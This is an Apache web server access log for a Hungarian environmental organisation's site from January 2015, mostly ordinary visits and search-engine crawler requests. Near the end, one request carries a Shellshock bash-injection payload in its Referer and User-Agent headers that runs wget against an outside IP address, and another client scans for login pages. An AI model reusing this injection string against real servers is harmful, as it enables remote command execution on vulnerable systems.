188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/paprika.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/abauji.jpg HTTP/1.1" 200 21716 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/benzinpisztoly.jpg HTTP/1.1" 200 2317 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/marhafej.jpg HTTP/1.1" 200 3545 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/zoldseg.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/citrom.jpg HTTP/1.1" 200 11781 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/adventikoszoru.jpg HTTP/1.1" 200 5581 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/naposoldal.jpg HTTP/1.1" 200 10106 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/encsgyumi.jpg HTTP/1.1" 200 13077 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/gyurgyalag.jpg HTTP/1.1" 200 2435 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/encs.jpg HTTP/1.1" 200 12831 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/terelo.jpg HTTP/1.1" 200 10975 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/varboibekak2011.jpg HTTP/1.1" 200 9200 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/mctermeloipiac.jpg HTTP/1.1" 200 3752 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/1%20szazalek.jpg HTTP/1.1" 200 16636 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/viz.jpg HTTP/1.1" 200 2622 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/bioszulinap2011.jpg HTTP/1.1" 200 17649 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:08 +0100] "GET / HTTP/1.1" 200 884 "http://zoldkapcsolat.hu/index.php/9-hirek/292-palyazat-tudatos-fogyasztok-szamara" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:08 +0100] "GET /pattern.jpg HTTP/1.1" 200 13798 "http://greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:09 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "http://greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:09 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:09 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:09 +0100] "GET /hirek/hirek.txt HTTP/1.1" 200 96857 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:09 +0100] "GET /esemenynaptar/SparkEventsCalendar_loadVars.txt HTTP/1.1" 200 72712 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /banner/norway.jpg HTTP/1.1" 200 3191 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/biomassza_forum.jpg HTTP/1.1" 200 6616 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/helyivedett.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/biomassza2.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/programindito.jpg HTTP/1.1" 200 6594 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/kocsonyabeka.jpg HTTP/1.1" 200 4334 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/beno.jpg HTTP/1.1" 200 2623 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/gmokrumpli.jpg HTTP/1.1" 200 9110 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/foldnapja.jpg HTTP/1.1" 200 4081 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/nullahullakovesd%20011.jpg HTTP/1.1" 200 8674 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/foldnap2010.jpg HTTP/1.1" 200 7191 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/gmoevo.jpg HTTP/1.1" 200 2951 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/gmofree.gif HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/torta.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/paprika.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/benzinpisztoly.jpg HTTP/1.1" 200 2317 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/marhafej.jpg HTTP/1.1" 200 3545 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/abauji.jpg HTTP/1.1" 200 21716 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/zoldseg.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/citrom.jpg HTTP/1.1" 200 11781 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/adventikoszoru.jpg HTTP/1.1" 200 5581 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/naposoldal.jpg HTTP/1.1" 200 10106 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/encsgyumi.jpg HTTP/1.1" 200 13077 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/gyurgyalag.jpg HTTP/1.1" 200 2435 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/encs.jpg HTTP/1.1" 200 12831 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/varboibekak2011.jpg HTTP/1.1" 200 9200 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/mctermeloipiac.jpg HTTP/1.1" 200 3752 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/terelo.jpg HTTP/1.1" 200 10975 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/1%20szazalek.jpg HTTP/1.1" 200 16636 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/viz.jpg HTTP/1.1" 200 2622 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
78.131.88.34 - - [08/Jan/2015:15:31:10 +0100] "GET /hirek/bioszulinap2011.jpg HTTP/1.1" 200 17649 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
66.249.78.67 - - [08/Jan/2015:15:40:44 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
188.165.15.90 - - [08/Jan/2015:16:34:17 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
94.44.243.63 - - [08/Jan/2015:16:35:02 +0100] "GET /aktualis_elemei/katonai_elemei/image002.jpg HTTP/1.1" 200 34104 "https://www.google.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
188.6.215.33 - - [08/Jan/2015:16:44:52 +0100] "GET /aktualis_elemei/bio2szulinap_elemei/image052.jpg HTTP/1.1" 200 11533 "https://www.google.hu/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60"
212.96.58.83 - - [08/Jan/2015:17:05:19 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0"
212.96.58.83 - - [08/Jan/2015:17:05:21 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0"
180.76.6.56 - - [08/Jan/2015:17:14:24 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.78.108 - - [08/Jan/2015:18:44:52 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.182.37.224 - - [08/Jan/2015:18:49:23 +0100] "GET /aktualis_elemei/katonai_elemei/image003.jpg HTTP/1.1" 200 88392 "https://www.google.hu/" "Mozilla/5.0 (Linux; Android 4.4.2; W032i-C3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Safari/537.36"
178.32.101.10 - - [08/Jan/2015:19:26:55 +0100] "GET / HTTP/1.0" 200 884 "-" "-"
178.32.101.10 - - [08/Jan/2015:19:26:55 +0100] "GET /wp-login.php HTTP/1.0" 404 1181 "-" "-"
178.32.101.10 - - [08/Jan/2015:19:26:56 +0100] "GET /administrator/index.php HTTP/1.0" 404 1181 "-" "-"
66.249.78.67 - - [08/Jan/2015:20:59:55 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.182.119.189 - - [08/Jan/2015:22:04:48 +0100] "GET /kiadvany/riport.jpg HTTP/1.1" 200 630631 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"
66.249.78.81 - - [08/Jan/2015:23:48:46 +0100] "GET /kiadvany/miskolchvte.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.67 - - [09/Jan/2015:00:06:35 +0100] "GET /aktualis_elemei/bio2szulinap.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.3.101.198 - - [09/Jan/2015:00:16:55 +0100] "GET /aktualis_elemei/katonai_elemei/image004.jpg HTTP/1.1" 200 56554 "https://www.google.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
207.46.13.35 - - [09/Jan/2015:00:28:20 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.35 - - [09/Jan/2015:00:28:25 +0100] "GET /aktualis_elemei/kakcionap.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
95.108.158.230 - - [09/Jan/2015:00:56:26 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.230 - - [09/Jan/2015:00:56:26 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.189.115 - - [09/Jan/2015:00:56:28 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.230 - - [09/Jan/2015:00:56:29 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.195.1 - - [09/Jan/2015:00:56:31 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.230 - - [09/Jan/2015:00:56:32 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.189.116 - - [09/Jan/2015:00:56:34 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.230 - - [09/Jan/2015:00:56:36 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.230 - - [09/Jan/2015:00:56:36 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.81.136 - - [09/Jan/2015:00:56:39 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.195.5 - - [09/Jan/2015:00:56:41 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.189.117 - - [09/Jan/2015:00:56:44 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.230 - - [09/Jan/2015:00:56:47 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.195.11 - - [09/Jan/2015:00:56:49 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
100.43.81.137 - - [09/Jan/2015:00:56:53 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.230 - - [09/Jan/2015:00:56:56 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
54.154.62.72 - - [09/Jan/2015:01:07:09 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; JobKeresoBot; http://www.kozvetlen-allasok.hu/help.jsp jobkereso at gmail dot com)"
54.154.62.72 - - [09/Jan/2015:01:07:09 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; JobKeresoBot; http://www.kozvetlen-allasok.hu/help.jsp jobkereso at gmail dot com)"
54.77.5.59 - - [09/Jan/2015:01:16:35 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; JobKeresoBot; http://www.kozvetlen-allasok.hu/help.jsp jobkereso at gmail dot com)"
54.77.5.59 - - [09/Jan/2015:01:16:35 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; JobKeresoBot; http://www.kozvetlen-allasok.hu/help.jsp jobkereso at gmail dot com)"
66.249.78.67 - - [09/Jan/2015:02:11:18 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.67 - - [09/Jan/2015:02:11:18 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
180.76.5.189 - - [09/Jan/2015:02:13:56 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.67.73 - - [09/Jan/2015:02:41:10 +0100] "GET /aktualis_elemei/katonai.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.41 - - [09/Jan/2015:03:36:42 +0100] "GET /aktualis_elemei/hkszirmamtp.html HTTP/1.1" 200 15781 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.41 - - [09/Jan/2015:03:36:52 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.81 - - [09/Jan/2015:03:56:23 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.35 - - [09/Jan/2015:03:56:35 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.35 - - [09/Jan/2015:03:56:42 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.35 - - [09/Jan/2015:03:56:46 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.74 - - [09/Jan/2015:04:26:14 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
188.165.15.97 - - [09/Jan/2015:04:30:12 +0100] "GET /aktualis_elemei/kakcionap.html HTTP/1.1" 200 9027 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
66.249.78.74 - - [09/Jan/2015:04:50:31 +0100] "GET /kiadvany/delbukk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.101 - - [09/Jan/2015:05:00:05 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.23 - - [09/Jan/2015:05:00:05 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.181.108.95 - - [09/Jan/2015:05:08:41 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.56 - - [09/Jan/2015:05:10:36 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.78.74 - - [09/Jan/2015:05:35:37 +0100] "GET /kiadvany/miskolchvte.pdf HTTP/1.1" 200 4059249 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.35 - - [09/Jan/2015:05:44:23 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.35 - - [09/Jan/2015:05:44:26 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.74 - - [09/Jan/2015:05:50:24 +0100] "GET /aktualis_elemei/bio2szulinap.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.31.161.36 - - [09/Jan/2015:05:51:23 +0100] "GET / HTTP/1.1" 200 884 "() { :;}; echo; /usr/bin/env wget http://185.31.161.36/robots.txt?http://greenaction.hu/ -O /dev/null;" "() { :;}; echo; /usr/bin/env wget http://185.31.161.36/robots.txt?http://greenaction.hu/ -O /dev/null;"
207.46.13.35 - - [09/Jan/2015:06:02:01 +0100] "GET /aktualis_elemei/klimaorjaratp.html HTTP/1.1" 200 9683 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.67 - - [09/Jan/2015:06:36:57 +0100] "GET /kiadvany/miskolchvte.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.41 - - [09/Jan/2015:07:06:49 +0100] "GET /aktualis_elemei/bekamentes.html HTTP/1.1" 200 27223 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.81 - - [09/Jan/2015:07:26:38 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.81 - - [09/Jan/2015:07:30:40 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.74 - - [09/Jan/2015:07:31:06 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.81 - - [09/Jan/2015:08:15:18 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.81 - - [09/Jan/2015:08:17:02 +0100] "GET /kiadvany/delbukk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.101 - - [09/Jan/2015:08:33:04 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.81 - - [09/Jan/2015:08:34:15 +0100] "GET /aktualis_elemei/bio2szulinap.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.223.151.148 - - [09/Jan/2015:08:47:24 +0100] "GET /kiadvany/riport.pdf HTTP/1.1" 200 1048785 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
89.223.151.148 - - [09/Jan/2015:08:47:26 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
